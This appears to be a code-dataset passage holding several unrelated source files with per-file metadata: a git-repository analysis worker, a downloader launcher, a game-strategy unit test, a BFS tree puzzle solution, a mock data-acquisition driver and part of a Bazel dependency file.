        multithreaded = self.augur_config.get_value("Facade", "multithreaded")
        # Command-line flags (inherited from standalone facade-worker.py)
        # override the config values read above.
        opts, args = getopt.getopt(sys.argv[1:], 'hdpcuUaAmnfIrx')
        for opt in opts:
            if opt[0] == '-h':
                print("\nfacade-worker.py does everything by default except invalidating caches\n"
                      "and forcing updates, unless invoked with one of the following options.\n"
                      "In those cases, it will only do what you have selected.\n\n"
                      "Options:\n"
                      " -d Delete marked repos\n"
                      " -c Run 'git clone' on new repos\n"
                      " -u Check if any repos should be marked for updating\n"
                      " -U Force all repos to be marked for updating\n"
                      " -p Run 'git pull' on repos\n"
                      " -a Analyze git repos\n"
                      " -A Force all repos to be analyzed\n"
                      " -m Disable multithreaded mode (but why?)\n"
                      " -n Nuke stored affiliations (if mappings modified by hand)\n"
                      " -f Fill empty affiliations\n"
                      " -I Invalidate caches\n"
                      " -r Rebuild unknown affiliation and web caches\n"
                      " -x Create Excel summary files\n\n")
                sys.exit(0)
            elif opt[0] == '-d':
                delete_marked_repos = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: delete marked repos.')
            elif opt[0] == '-c':
                clone_repos = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: clone new repos.')
            elif opt[0] == '-u':
                check_updates = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: checking for repo updates')
            elif opt[0] == '-U':
                force_updates = 1
                self.cfg.log_activity('Info','Option set: forcing repo updates')
            elif opt[0] == '-p':
                pull_repos = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: update repos.')
            elif opt[0] == '-a':
                run_analysis = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: running analysis.')
            elif opt[0] == '-A':
                force_analysis = 1
                run_analysis = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: forcing analysis.')
            elif opt[0] == '-m':
                multithreaded = 0
                self.cfg.log_activity('Info','Option set: disabling multithreading.')
            elif opt[0] == '-n':
                nuke_stored_affiliations = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: nuking all affiliations')
            elif opt[0] == '-f':
                fix_affiliations = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: fixing affiliations.')
            elif opt[0] == '-I':
                force_invalidate_caches = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: Invalidate caches.')
            elif opt[0] == '-r':
                rebuild_caches = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: rebuilding caches.')
            elif opt[0] == '-x':
                create_xlsx_summary_files = 1
                limited_run = 1
                self.cfg.log_activity('Info','Option set: creating Excel summary files.')

        # Get the location of the directory where git repos are stored
        repo_base_directory = self.cfg.repo_base_directory

        # Determine if it's safe to start the script
        current_status = self.cfg.get_setting('utility_status')
        if current_status != 'Idle':
            # NOTE(review): the exit is commented out, so this now only logs.
            self.cfg.log_activity('Error','Something is already running, aborting maintenance '
                'and analysis.\nIt is unsafe to continue.')
            # sys.exit(1)
        if len(repo_base_directory) == 0:
            self.cfg.log_activity('Error','No base directory. It is unsafe to continue.')
            self.cfg.update_status('Failed: No base directory')
            sys.exit(1)

        # Begin working
        start_time = time.time()
        self.cfg.log_activity('Quiet','Running facade-worker')
        if not limited_run or (limited_run and delete_marked_repos):
            git_repo_cleanup(self.cfg)
        if not limited_run or (limited_run and clone_repos):
            git_repo_initialize(self.cfg)
        if not limited_run or (limited_run and check_updates):
            check_for_repo_updates(self.cfg)
        if force_updates:
            force_repo_updates(self.cfg)
        if not limited_run or (limited_run and pull_repos):
            git_repo_updates(self.cfg)
        if force_analysis:
            force_repo_analysis(self.cfg)
        if not limited_run or (limited_run and run_analysis):
            analysis(self.cfg, multithreaded)
        if nuke_stored_affiliations:
            nuke_affiliations(self.cfg)
        if not limited_run or (limited_run and fix_affiliations):
            fill_empty_affiliations(self.cfg)
        if force_invalidate_caches:
            invalidate_caches(self.cfg)
        if not limited_run or (limited_run and rebuild_caches):
            rebuild_unknown_affiliation_and_web_caches(self.cfg)
        if not limited_run or (limited_run and create_xlsx_summary_files):
            # Excel generation is currently disabled (import commented out).
            self.cfg.log_activity('Info','Creating summary Excel files')
            # from excel_generators import *
            self.cfg.log_activity('Info','Creating summary Excel files (complete)')

        # All done
        self.cfg.update_status('Idle')
        self.cfg.log_activity('Quiet','facade-worker.py completed')
        elapsed_time = time.time() - start_time
        print('\nCompleted in %s\n' % datetime.timedelta(seconds=int(elapsed_time)))
        self.cfg.cursor.close()
        self.cfg.cursor_people.close()
        self.cfg.db.close()
        self.cfg.db_people.close()
| 42.041801
| 169
| 0.619426
|
4a15c6268e0cd825f3254893fd5970bf47d5d509
| 55
|
py
|
Python
|
fb.py
|
payz404/FBDownloader
|
af59dd66c76851e9e85a1da5cfb5299b20ac231b
|
[
"Apache-2.0"
] | null | null | null |
fb.py
|
payz404/FBDownloader
|
af59dd66c76851e9e85a1da5cfb5299b20ac231b
|
[
"Apache-2.0"
] | null | null | null |
fb.py
|
payz404/FBDownloader
|
af59dd66c76851e9e85a1da5cfb5299b20ac231b
|
[
"Apache-2.0"
] | null | null | null |
# Explicit import instead of 'from Main import *' -- only fbDownloader is
# used, and star imports hide where names come from.
from Main import fbDownloader

# Instantiate the downloader and run it immediately (this file is a script).
fb = fbDownloader()
fb.Download()
| 11
| 19
| 0.690909
|
4a15c7aef85622d01c8b4cc39e5b3a3ab4b10c0c
| 712
|
py
|
Python
|
axelrod/tests/unit/test_negation.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_negation.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_negation.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | 1
|
2019-03-11T08:56:09.000Z
|
2019-03-11T08:56:09.000Z
|
"""Tests for the Neg Strategy"""
import axelrod
from .test_player import TestPlayer
# Short aliases for the two possible actions (cooperate / defect).
C, D = axelrod.Actions.C, axelrod.Actions.D
class TestNegation(TestPlayer):
    """Tests for the Negation strategy (plays the opposite of the
    opponent's last move; first move is random)."""

    name = "Negation"
    player = axelrod.Negation
    expected_classifier = {
        'memory_depth': 1,
        'stochastic': True,
        'makes_use_of': set(),
        'long_run_time': False,
        'inspects_source': False,
        'manipulates_source': False,
        'manipulates_state': False
    }

    def test_strategy(self):
        # First move is random.
        self.first_play_test(C, seed=1)
        self.first_play_test(D, seed=2)
        # Repeats opposite of opponents last action.
        self.second_play_test(D, C, D, C)
| 24.551724
| 52
| 0.630618
|
4a15c87d561ea3f8954efb8602d0e8a7db532edc
| 939
|
py
|
Python
|
src/data/1068.py
|
NULLCT/LOMC
|
79a16474a8f21310e0fb47e536d527dd5dc6d655
|
[
"MIT"
] | null | null | null |
src/data/1068.py
|
NULLCT/LOMC
|
79a16474a8f21310e0fb47e536d527dd5dc6d655
|
[
"MIT"
] | null | null | null |
src/data/1068.py
|
NULLCT/LOMC
|
79a16474a8f21310e0fb47e536d527dd5dc6d655
|
[
"MIT"
] | null | null | null |
from collections import deque
def BFS(start, tree):
    """Breadth-first traversal recording node depths.

    ``start`` is a (node, depth) pair and ``tree`` an adjacency list; each
    reached node's depth is written into the module-level ``depth_list``.
    """
    queue = deque([start])
    visited = {start[0]}  # set membership keeps the check O(1) per node
    while queue:
        node, depth = queue.popleft()
        depth_list[node] = depth
        for neighbor in tree[node]:
            if neighbor not in visited:
                visited.add(neighbor)
                queue.append((neighbor, depth + 1))
# Read an n-node tree and q queries from stdin.
n, q = map(int, input().split())
edges = [list() for i in range(n)]
for i in range(n - 1):
    a, b = map(int, input().split())
    a, b = a - 1, b - 1  # convert to 0-based node ids
    edges[a].append(b)
    edges[b].append(a)
# Depth of every node from node 0, filled in by BFS.
depth_list = [0] * n
BFS((0, 0), edges)
#print(depth_list)
# Two nodes at depths of equal parity have an even path length between
# them (meeting in a town); odd parity means they meet on a road.
for k in range(q):
    c, d = map(int, input().split())
    c, d = c - 1, d - 1
    if (depth_list[c] - depth_list[d]) % 2 == 0:
        print("Town")
    else:
        print("Road")
| 22.902439
| 48
| 0.514377
|
4a15c8ad3484167858dca62b2456d81fe21f277b
| 9,746
|
py
|
Python
|
acq4/drivers/nidaq/mock.py
|
aleonlein/acq4
|
4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555
|
[
"MIT"
] | 1
|
2020-06-04T17:04:53.000Z
|
2020-06-04T17:04:53.000Z
|
acq4/drivers/nidaq/mock.py
|
aleonlein/acq4
|
4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555
|
[
"MIT"
] | 24
|
2016-09-27T17:25:24.000Z
|
2017-03-02T21:00:11.000Z
|
acq4/drivers/nidaq/mock.py
|
sensapex/acq4
|
9561ba73caff42c609bd02270527858433862ad8
|
[
"MIT"
] | 4
|
2016-10-19T06:39:36.000Z
|
2019-09-30T21:06:45.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import six
import sys, time, os
import numpy as np
import acq4.util.clibrary as clibrary
import ctypes
# Parse the NIDAQmx C header once at import time so the mock exposes the
# same constants as the real driver; results are cached per platform.
modDir = os.path.dirname(__file__)
headerFiles = [os.path.join(modDir, "NIDAQmx.h")]
cacheFile = os.path.join(modDir, 'NIDAQmx_headers_%s.cache' % sys.platform)
DEFS = clibrary.CParser(headerFiles, cache=cacheFile, types={'__int64': ('long long')}, verbose=False)
from . import SuperTask
class MockNIDAQ:
    def __init__(self):
        # Load the header definitions with no real driver library (handle is
        # None), so NIDAQmx constants resolve but no hardware is touched.
        self.lib = clibrary.CLibrary(None, DEFS, prefix='DAQmx_')
        # NOTE(review): the mock-data / sampleRate setup is commented out,
        # but GetReadAvailSampPerChan below still reads self.sampleRate and
        # self.dataPtr -- calling it without start() would fail; confirm.
        #self.data = mockdata.getMockData('cell')
        #self.data = hstack([self.data, self.data])
        #self.sampleRate = 20000.
        #self.loopTime = 20.
        #self.dataPtr = 0.0
        # Static description of the fake hardware: one device with four
        # AI/AO channels and one 4-line digital port.
        self.devs = {
            'Dev1': {
                'aiChans': {'/Dev1/ai0': 0, '/Dev1/ai1': 0, '/Dev1/ai2': 0, '/Dev1/ai3': 0},
                'aoChans': {'/Dev1/ao0': 0, '/Dev1/ao1': 0, '/Dev1/ao2': 0, '/Dev1/ao3': 0},
                'ports': {'/Dev1/port0': 0},
                'lines': {'/Dev1/port0/line0': 0, '/Dev1/port0/line1': 0, '/Dev1/port0/line2': 0, '/Dev1/port0/line3': 0,},
            }
        }
        self.clocks = {}
    def __getattr__(self, attr):
        # Delegate unknown attribute lookups (e.g. Val_* constants) to the
        # parsed NIDAQmx library wrapper.
        return getattr(self.lib, attr)
def listAIChannels(self, dev):
return list(self.devs[dev]['aiChans'].keys())
def listAOChannels(self, dev):
return list(self.devs[dev]['aoChans'].keys())
def listDILines(self, dev):
return list(self.devs[dev]['lines'].keys())
def listDIPorts(self, dev):
return list(self.devs[dev]['ports'].keys())
def listDOLines(self, dev):
return list(self.devs[dev]['lines'].keys())
def listDOPorts(self, dev):
return list(self.devs[dev]['ports'].keys())
def listDevices(self):
return list(self.devs.keys())
    def createTask(self, *args):
        # NOTE(review): shadowed by the second createTask() defined further
        # down; at class-definition time the later definition wins, so this
        # variant is dead code.  Kept byte-identical pending cleanup.
        return self
    def createSuperTask(self):
        # Build a SuperTask bound to this mock as if it were the real DAQ.
        return SuperTask.SuperTask(self)
    def start(self):
        # Record the wall-clock start time; GetReadAvailSampPerChan uses it
        # to fake the number of samples accumulated since the task started.
        self.dataPtr = time.time()
    def read(self, size):
        """Mock acquisition read: returns an all-zero array of *size* samples.

        NOTE(review): the original looped-mock-data pacing code below is
        commented out; it returned a (data, size) tuple, whereas this stub
        returns just the array -- confirm callers expect the bare array.
        """
        #dataLen = size / self.sampleRate
        #dataEnd = self.dataPtr + dataLen
        #now = time.time()
        #if dataEnd > now:
        #time.sleep(dataEnd-now)
        #start = int((self.dataPtr % self.loopTime) * self.sampleRate)
        #stop = int(start + size)
        #self.dataPtr = dataEnd
        ##print "read", start, stop
        ##print "DAQ Returning %d:%d at %f" % (start, stop, time.time())
        #return (self.data[:, start:stop], size)
        return np.zeros(size)
    def GetReadAvailSampPerChan(self):
        # Samples "accumulated" since start() at the nominal sample rate.
        # NOTE(review): self.sampleRate is never assigned (its setup in
        # __init__ is commented out), so this raises AttributeError if
        # called -- confirm whether this path is still used.
        return self.sampleRate * (time.time() - self.dataPtr)
    def createTask(self):
        # This definition overrides the earlier createTask(*args) above.
        # NOTE(review): Task is not defined in this part of the file --
        # presumably declared elsewhere in the module; confirm.
        return Task(self)
def interpretMode(self, mode):
modes = {
'rse': self.lib.Val_RSE,
'nrse': self.lib.Val_NRSE,
'diff': self.lib.Val_Diff,
'chanperline': self.lib.Val_ChanPerLine,
'chanforalllines': self.lib.Val_ChanForAllLines
}
if isinstance(mode, six.string_types):
mode = mode.lower()
mode = modes.get(mode, None)
return mode
def interpretChannel(self, chan):
parts = chan.lstrip('/').split('/')
dev = parts.pop(0)
if len(parts) == 1 and parts[0].startswith('line'):
# normalize "/Dev1/line0' => ('Dev1', 'port0/line0')
chan = 'port0/' + parts[0]
else:
chan = '/'.join(parts)
return dev, chan
def writeAnalogSample(self, chan, value, vRange=[-10., 10.], timeout=10.0):
"""Set the value of an AO or DO port"""
t = self.createTask()
t.CreateAOVoltageChan(chan, "", vRange[0], vRange[1], self.lib.Val_Volts, None)
#t.WriteAnalogScalarF64(True, timeout, value, None)
def readAnalogSample(self, chan, mode=None, vRange=[-10., 10.], timeout=10.0):
"""Get the value of an AI port"""
if mode is None:
mode = self.lib.Val_Cfg_Default
else:
mode = self.interpretMode(mode)
t = self.createTask()
t.CreateAIVoltageChan(chan, "", mode, vRange[0], vRange[1], self.lib.Val_Volts, None)
#val = ctypes.c_double(0.)
#t.ReadAnalogScalarF64(timeout, byref(val), None)
#return val.value
return 0.0
def writeDigitalSample(self, chan, value, timeout=10.):
"""Set the value of an AO or DO port"""
dev, chan = self.interpretChannel(chan)
chan = '/%s/%s' % (dev, chan)
self.devs[dev]['lines'][chan] = value
# t = self.createTask()
# t.CreateDOChan(chan, "", self.lib.Val_ChanForAllLines)
#t.WriteDigitalScalarU32(True, timeout, value, None)
def readDigitalSample(self, chan, timeout=10.0):
"""Get the value of an AI port"""
dev, chan = self.interpretChannel(chan)
chan = '/%s/%s' % (dev, chan)
return self.devs[dev]['lines'][chan]
# t = self.createTask()
# t.CreateDIChan(chan, "", self.lib.Val_ChanForAllLines)
# val = ctypes.c_ulong(0)
# t.ReadDigitalScalarU32(timeout, byref(val), None)
# return val.value
def startClock(self, clock, duration):
self.clocks[clock] = (time.time(), duration)
def stopClock(self, clock):
if clock not in self.clocks:
return
now = time.time()
start, dur = self.clocks[clock]
diff = (start+dur)-now
if diff > 0:
time.sleep(diff)
def checkClock(self, clock):
now = time.time()
start, dur = self.clocks[clock]
diff = (start+dur)-now
return diff <= 0
class Task:
    """Mock NIDAQmx task.

    Records channel-configuration calls and simulates timed execution via
    the owning MockNIDAQ's software sample clocks.  A channel's kwargs may
    carry a 'mockFunc' callback: for output tasks it receives the written
    data (plus the sample period); for input tasks it generates the samples
    returned by read().
    """

    def __init__(self, nd):
        self.nd = nd              # owning MockNIDAQ (provides the clocks)
        self.chans = []           # physical channel names, in creation order
        self.chOpts = []          # per-channel kwargs (may include 'mockFunc')
        self.clock = None         # configured sample clock name, or None
        self.nativeClock = None   # subsystem default clock for this task
        self.data = None          # last data array handed to write()
        self.mode = None          # one of 'ai', 'ao', 'di', 'do'

    def _addChan(self, chan, kargs, mode):
        # Common body of the four Create*Chan entry points (was copy-pasted
        # four times in the original).
        self.chans.append(chan)
        self.chOpts.append(kargs)
        self.mode = mode

    def CreateAIVoltageChan(self, *args, **kargs):
        self._addChan(args[0], kargs, 'ai')

    def CreateAOVoltageChan(self, *args, **kargs):
        self._addChan(args[0], kargs, 'ao')

    def CreateDIChan(self, *args, **kargs):
        self._addChan(args[0], kargs, 'di')

    def CreateDOChan(self, *args, **kargs):
        self._addChan(args[0], kargs, 'do')

    def CfgSampClkTiming(self, clock, rate, b, c, nPts):
        """Record sample-clock configuration.

        An empty clock string means "use the native clock"; b and c are
        accepted for API compatibility and ignored.
        """
        if 'ai' in self.chans[0]:
            self.nativeClock = self.device() + '/ai/SampleClock'
        elif 'ao' in self.chans[0]:
            self.nativeClock = self.device() + '/ao/SampleClock'
        if clock == '':
            clock = None
        self.clock = clock
        self.rate = rate
        self.nPts = nPts

    def GetSampClkMaxRate(self):
        # Fixed plausible maximum sample rate for the mock hardware.
        return 2e6

    def device(self):
        """Return the device path (e.g. '/Dev1') of the first channel."""
        return '/' + self.chans[0].split('/')[1]

    def write(self, data):
        """Store output data and forward each channel's row to its
        'mockFunc' callback (with the sample period), if one was given.

        Returns the number of rows written.
        """
        self.data = data
        for i, opts in enumerate(self.chOpts):
            if 'mockFunc' in opts:
                opts['mockFunc'](data[i], 1.0 / self.rate)
        return len(data)

    def read(self):
        """Return (samples, nPts).

        Channels with a 'mockFunc' generate their own data; all others read
        as zeros.  Digital tasks yield int32, analog tasks float64.
        (Removed: the original computed an unused time vector on every call.)
        """
        dtype = np.int32 if 'd' in self.mode else np.float64
        data = np.empty((len(self.chans), self.nPts), dtype=dtype)
        for i, opts in enumerate(self.chOpts):
            data[i] = opts['mockFunc']() if 'mockFunc' in opts else 0
        return (data, self.nPts)

    def start(self):
        # Only start a clock if ours matches this task's native clock;
        # externally-clocked tasks are driven by some other task's clock.
        if self.clock is None or self.clock == self.nativeClock:
            self.nd.startClock(self.nativeClock, self.nPts / self.rate)

    def stop(self):
        """Wait for whichever clock drives this task to finish."""
        self.nd.stopClock(self.nativeClock if self.clock is None else self.clock)

    def isDone(self):
        """Return True when the driving clock has elapsed."""
        return self.nd.checkClock(self.nativeClock if self.clock is None else self.clock)

    def GetTaskNumChans(self):
        """Return the number of channels configured on this task."""
        return len(self.chans)

    def isOutputTask(self):
        return self.mode in ['ao', 'do']

    def isInputTask(self):
        return self.mode in ['ai', 'di']

    def TaskControl(self, *args):
        pass  # no-op in the mock

    def WriteAnalogScalarF64(self, a, timeout, val, b):
        pass  # no-op in the mock

    def WriteDigitalScalarU32(self, a, timeout, val, b):
        pass  # no-op in the mock
#class SuperTask:
#def __init__(self, nd):
#self.nd = nd
#def __getattr__(self, attr):
#print "SuperTask."+attr
#return lambda *args, **kargs: self
# Module-level singleton standing in for the real NIDAQ interface object.
NIDAQ = MockNIDAQ()
#class ModWrapper(object):
#def __init__(self, wrapped):
#self.wrapped = wrapped
#def __getattr__(self, name):
#try:
#return getattr(self.wrapped, name)
#except AttributeError:
#if name[:3] == 'Val':
#return None
#else:
#return lambda *args: NIDAQ
#def __iter__
#sys.modules[__name__] = ModWrapper(sys.modules[__name__])
| 31.038217
| 123
| 0.552842
|
4a15c8d1140cde18e1ae721f2cbb9aab0edf4eb5
| 43,226
|
bzl
|
Python
|
external.bzl
|
filmil/kythe
|
a030ce48ddf46b171736d136af10f8462c5a302a
|
[
"Apache-2.0"
] | null | null | null |
external.bzl
|
filmil/kythe
|
a030ce48ddf46b171736d136af10f8462c5a302a
|
[
"Apache-2.0"
] | null | null | null |
external.bzl
|
filmil/kythe
|
a030ce48ddf46b171736d136af10f8462c5a302a
|
[
"Apache-2.0"
] | null | null | null |
load("@bazel_gazelle//:deps.bzl", "gazelle_dependencies")
load("@bazel_tools//tools/build_defs/repo:git.bzl", "git_repository")
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load("@io_bazel_rules_go//go:deps.bzl", "go_register_toolchains", "go_rules_dependencies")
load("@rules_java//java:repositories.bzl", "rules_java_dependencies")
load("@rules_jvm_external//:defs.bzl", "maven_install")
load("@rules_proto//proto:repositories.bzl", "rules_proto_dependencies")
load("@io_kythe//:setup.bzl", "github_archive", "maybe")
load("@io_kythe//tools:build_rules/shims.bzl", "go_repository")
load("@io_kythe//tools/build_rules/llvm:repo.bzl", "git_llvm_repository")
load("@io_kythe//third_party/leiningen:lein_repo.bzl", "lein_repository")
load("@io_kythe//tools/build_rules/lexyacc:lexyacc.bzl", "lexyacc_configure")
load("@io_kythe//tools/build_rules/build_event_stream:repo.bzl", "build_event_stream_repository")
load("@io_kythe//kythe/cxx/extractor:toolchain.bzl", cxx_extractor_register_toolchains = "register_toolchains")
load("@rules_python//python:repositories.bzl", "py_repositories")
load("@bazel_toolchains//repositories:repositories.bzl", bazel_toolchains_repositories = "repositories")
load("@io_bazel_rules_rust//rust:repositories.bzl", "rust_repositories")
load("@io_bazel_rules_rust//proto:repositories.bzl", "rust_proto_repositories")
load("@io_bazel_rules_rust//:workspace.bzl", "bazel_version")
# The raze macros automatically check for duplicated dependencies so we can
# simply load each macro here.
load("//kythe/rust/examples/hello_world/cargo:crates.bzl", fetch_example_hello_world_remote_crates = "raze_fetch_remote_crates")
load("//kythe/rust/extractor/cargo:crates.bzl", fetch_extractor_remote_crates = "raze_fetch_remote_crates")
load("//kythe/rust/indexer/cargo:crates.bzl", fetch_indexer_remote_crates = "raze_fetch_remote_crates")
def _rule_dependencies():
    """Loads/registers dependencies for the Bazel rule sets Kythe uses.

    Covers Go (rules, toolchains, gazelle), Java, proto, Python, the
    remote-build toolchains, and Rust (pinned to a specific nightly).
    """
    go_rules_dependencies()
    go_register_toolchains()
    gazelle_dependencies()
    rules_java_dependencies()
    rules_proto_dependencies()
    py_repositories()
    bazel_toolchains_repositories()
    # Rust toolchain is pinned to a nightly snapshot by date.
    rust_repositories(version = "nightly", iso_date = "2020-06-23", dev_components = True)
    rust_proto_repositories()
    bazel_version(name = "bazel_version")
def _gazelle_ignore(**kwargs):
    """Dummy macro which causes gazelle to see a repository as already defined.

    Accepts and discards any keyword arguments (name, actual, importpath, ...);
    it exists purely so gazelle's repository scanner finds a matching call.
    """
def _proto_dependencies():
    """Fetches individual Bazel proto files needed by Kythe, pinned by sha256."""

    # Rather than pull down the entire Bazel source repository for a single file,
    # just grab the file we need and use it locally.
    maybe(
        build_event_stream_repository,
        name = "build_event_stream_proto",
        revision = "2.2.0",
        sha256s = {
            "build_event_stream.proto": "aa71ad693b7b474517ee3702318603d76baef35a6c13e9f8980f3962d91c2827",
            "command_line.proto": "a6fb6591aa50794431787169bc4fae16105ef5c401e7c30ecf0f775e0ab25c2c",
            "invocation_policy.proto": "5312a440a5d16e9bd72cd8561ad2f5d2b29579f19df7e13af1517c6ad9e7fa64",
            "option_filters.proto": "e3e8dfa9a4e05683bf1853a0be29fae46c753b18ad3d42b92bedcb412577f20f",
        },
    )
def _cc_dependencies():
    """Fetches the C/C++ and native-code dependencies of Kythe.

    Every archive is pinned by sha256 (or git commit); ``maybe`` skips any
    repository the enclosing WORKSPACE has already defined, so downstream
    users can override versions.  Also configures the lex/yacc and C++
    extractor toolchains at the end.
    """
    maybe(
        http_archive,
        name = "net_zlib",
        build_file = "@io_kythe//third_party:zlib.BUILD",
        sha256 = "c3e5e9fdd5004dcb542feda5ee4f0ff0744628baf8ed2dd5d66f8ca1197cb1a1",
        strip_prefix = "zlib-1.2.11",
        urls = [
            "https://mirror.bazel.build/zlib.net/zlib-1.2.11.tar.gz",
            "https://zlib.net/zlib-1.2.11.tar.gz",
        ],
    )

    maybe(
        http_archive,
        name = "org_libzip",
        build_file = "@io_kythe//third_party:libzip.BUILD",
        sha256 = "a5d22f0c87a2625450eaa5e10db18b8ee4ef17042102d04c62e311993a2ba363",
        strip_prefix = "libzip-rel-1-5-1",
        urls = [
            # Bazel does not like the official download link at libzip.org,
            # so use the GitHub release tag.
            "https://mirror.bazel.build/github.com/nih-at/libzip/archive/rel-1-5-1.zip",
            "https://github.com/nih-at/libzip/archive/rel-1-5-1.zip",
        ],
    )

    maybe(
        git_repository,
        name = "boringssl",
        # Use the github mirror because the official source at
        # https://boringssl.googlesource.com/boringssl does not allow
        # unauthenticated git clone and the archives suffer from
        # https://github.com/google/gitiles/issues/84 preventing the use of
        # sha256sum on archives.
        remote = "https://github.com/google/boringssl",
        # Commits must come from the master-with-bazel branch.
        # branch = "master-with-bazel",
        commit = "e0c35d6c06fd800de1092f0b4d4326570ca2617a",
        shallow_since = "1566966435 +0000",
    )

    maybe(
        http_archive,
        name = "com_github_tencent_rapidjson",
        build_file = "@io_kythe//third_party:rapidjson.BUILD",
        sha256 = "8e00c38829d6785a2dfb951bb87c6974fa07dfe488aa5b25deec4b8bc0f6a3ab",
        strip_prefix = "rapidjson-1.1.0",
        urls = [
            "https://mirror.bazel.build/github.com/Tencent/rapidjson/archive/v1.1.0.zip",
            "https://github.com/Tencent/rapidjson/archive/v1.1.0.zip",
        ],
    )

    # Make sure to update regularly in accordance with Abseil's principle of live at HEAD
    maybe(
        github_archive,
        name = "com_google_absl",
        repo_name = "abseil/abseil-cpp",
        commit = "0033c9ea91a52ade7c6b725aa2ef3cbe15463421",
        sha256 = "a245e059514f2e3bd0bd6ca455b6a66e34656b1b447fec3dc98419153af23b14",
    )

    maybe(
        github_archive,
        name = "com_google_googletest",
        repo_name = "google/googletest",
        sha256 = "4a4cbf4bb09606f42a0cdd6f0893fbf1e257243fda64bc5b585d027808a3a64b",
        commit = "61f010d703b32de9bfb20ab90ece38ab2f25977f",
    )

    maybe(
        http_archive,
        name = "com_github_google_glog",
        strip_prefix = "glog-ba8a9f6952d04d1403b97df24e6836227751454e",
        sha256 = "9b4867ab66c33c41e2672b5de7e3133d38411cdb75eeb0d2b72c88bb10375c71",
        urls = [
            "https://mirror.bazel.build/github.com/google/glog/archive/ba8a9f6952d04d1403b97df24e6836227751454e.zip",
            "https://github.com/google/glog/archive/ba8a9f6952d04d1403b97df24e6836227751454e.zip",
        ],
        # Build glog without gflags support to avoid the extra dependency.
        build_file_content = "\n".join([
            "load(\"//:bazel/glog.bzl\", \"glog_library\")",
            "glog_library(with_gflags=0)",
        ]),
    )

    maybe(
        http_archive,
        name = "org_brotli",
        sha256 = "4c61bfb0faca87219ea587326c467b95acb25555b53d1a421ffa3c8a9296ee2c",
        strip_prefix = "brotli-1.0.7",
        patch_args = ["-p1"],
        patches = [
            "@io_kythe//third_party:brotli/brotli-1.0.7-int-float-conversion.patch",
        ],
        urls = [
            "https://mirror.bazel.build/github.com/google/brotli/archive/v1.0.7.tar.gz",
            "https://github.com/google/brotli/archive/v1.0.7.tar.gz",
        ],
    )

    maybe(
        http_archive,
        name = "com_google_riegeli",
        sha256 = "762b838bcf3ddc02e1b334103ef21f02316e57be373444ff7c7461781935c8b6",
        strip_prefix = "riegeli-a624e7f8e98aff394904685ecbba2e5ee664606a",
        urls = [
            "https://mirror.bazel.build/github.com/google/riegeli/archive/a624e7f8e98aff394904685ecbba2e5ee664606a.zip",
            "https://github.com/google/riegeli/archive/a624e7f8e98aff394904685ecbba2e5ee664606a.zip",
        ],
    )

    maybe(
        http_archive,
        name = "org_libmemcached_libmemcached",
        build_file = "@io_kythe//third_party:libmemcached.BUILD",
        sha256 = "e22c0bb032fde08f53de9ffbc5a128233041d9f33b5de022c0978a2149885f82",
        strip_prefix = "libmemcached-1.0.18",
        urls = [
            "https://mirror.bazel.build/launchpad.net/libmemcached/1.0/1.0.18/+download/libmemcached-1.0.18.tar.gz",
            "https://launchpad.net/libmemcached/1.0/1.0.18/+download/libmemcached-1.0.18.tar.gz",
        ],
    )

    maybe(
        http_archive,
        name = "se_haxx_curl",
        build_file = "@io_kythe//third_party:curl.BUILD",
        sha256 = "ff3e80c1ca6a068428726cd7dd19037a47cc538ce58ef61c59587191039b2ca6",
        strip_prefix = "curl-7.49.1",
        urls = [
            "https://mirror.bazel.build/curl.haxx.se/download/curl-7.49.1.tar.gz",
            "https://curl.haxx.se/download/curl-7.49.1.tar.gz",
        ],
    )

    maybe(
        http_archive,
        name = "com_googlesource_code_re2",
        sha256 = "ae9b962dbd6427565efd3e9503acb40a1385b21962c29050546c9347ac7fa93f",
        strip_prefix = "re2-2019-01-01",
        urls = [
            "https://mirror.bazel.build/github.com/google/re2/archive/2019-01-01.zip",
            "https://github.com/google/re2/archive/2019-01-01.zip",
        ],
    )

    maybe(
        http_archive,
        name = "com_github_stedolan_jq",
        build_file = "@io_kythe//third_party:jq.BUILD",
        sha256 = "998c41babeb57b4304e65b4eb73094279b3ab1e63801b6b4bddd487ce009b39d",
        strip_prefix = "jq-1.4",
        urls = [
            "https://mirror.bazel.build/github.com/stedolan/jq/releases/download/jq-1.4/jq-1.4.tar.gz",
            "https://github.com/stedolan/jq/releases/download/jq-1.4/jq-1.4.tar.gz",
        ],
    )

    maybe(
        http_archive,
        name = "com_github_google_snappy",
        build_file = "@io_kythe//third_party:snappy.BUILD",
        sha256 = "61e05a0295fd849072668b1f3494801237d809427cfe8fd014cda455036c3ef7",
        strip_prefix = "snappy-1.1.7",
        urls = [
            "https://mirror.bazel.build/github.com/google/snappy/archive/1.1.7.zip",
            "https://github.com/google/snappy/archive/1.1.7.zip",
        ],
    )

    maybe(
        http_archive,
        name = "com_github_google_leveldb",
        build_file = "@io_kythe//third_party:leveldb.BUILD",
        sha256 = "5b2bd7a91489095ad54bb81ca6544561025b48ec6d19cc955325f96755d88414",
        strip_prefix = "leveldb-1.20",
        urls = [
            "https://mirror.bazel.build/github.com/google/leveldb/archive/v1.20.zip",
            "https://github.com/google/leveldb/archive/v1.20.zip",
        ],
    )

    maybe(
        git_llvm_repository,
        name = "org_llvm",
    )

    # Toolchain setup must come after the repositories they depend on.
    lexyacc_configure()
    cxx_extractor_register_toolchains()
def _java_dependencies():
    """Fetches Java dependencies: bazel-common, flogger, and the pinned Maven set."""
    maybe(
